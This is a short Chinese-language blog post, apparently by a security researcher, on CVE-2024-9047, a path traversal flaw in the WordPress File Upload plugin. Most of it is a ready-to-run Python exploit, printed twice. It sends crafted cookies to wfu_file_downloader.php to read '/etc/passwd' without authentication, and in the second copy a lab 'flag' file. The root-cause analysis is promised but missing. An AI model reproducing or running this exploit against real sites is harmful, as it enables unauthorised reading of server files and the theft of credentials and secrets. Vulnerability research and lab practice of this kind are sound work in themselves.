路漫漫其修远兮 吾将上下而求索
0%

CVE-2024-9047

发表于 分类于

CVE-2024-9047

漏洞描述

wordpress的file_upload插件存在路径遍历漏洞,漏洞位于wfu_file_downloader.php文件中,使得未经身份验证的攻击者能够读取或者删除原始意图之外的文件,成功利用这个漏洞要求目标wordpress安装使用php7.4或者更早的版本

影响版本

wordpress file upload <= 4.24.11

直接贴上利用的poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
from urllib.parse import urljoin
import time


def fileuploadcheck(url):
    timestamp = str(int(time.time()))
    target_url = urljoin(url, "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?"
                              "file=dr0se"
                              "&dboption_base=cookies"
                              "&handler=dboption"                   
                              "&session_legacy=1"
                              "&dboption_useold=1"
                              "&wfu_cookie=wp_wpfileupload_dr0se"
                              "&ticket=dr0se")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
        "Cookie": f"wp_wpfileupload_dr0se=1;"
                  f" wfu_storage_dr0se=/../../../../../etc/passwd;"
                  f" wfu_download_ticket_dr0se={timestamp}; "
                  f"wfu_ABSPATH=/;"
    }

    try:
        response = requests.get(target_url, verify=False, headers=headers, timeout=10)
        print(response.text)
    except Exception as e:
        print(f"Error while checking {url}: {e}")


if __name__ == "__main__":
    url = input()
    fileuploadcheck(url)

以春秋云境靶场的题目为例,

image-20250713012204307

效果如下,成功实现任意文件读取

成因分析(日后补上)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
from urllib.parse import urljoin
import time


def fileuploadcheck(url):
    timestamp = str(int(time.time()))
    target_url = urljoin(url, "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?"
                              "file=dr0se"
                              "&dboption_base=cookies"
                              "&handler=dboption"                   
                              "&session_legacy=1"
                              "&dboption_useold=1"
                              "&wfu_cookie=wp_wpfileupload_dr0se"
                              "&ticket=dr0se")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
        "Cookie": f"wp_wpfileupload_dr0se=1;"
                  f" wfu_storage_dr0se=/../../../../../flag;"
                  f" wfu_download_ticket_dr0se={timestamp}; "
                  f"wfu_ABSPATH=/;"
    }

    try:
        response = requests.get(target_url, verify=False, headers=headers, timeout=10)
        print(response.text)
    except Exception as e:
        print(f"Error while checking {url}: {e}")


if __name__ == "__main__":
    url = input()
    fileuploadcheck(url)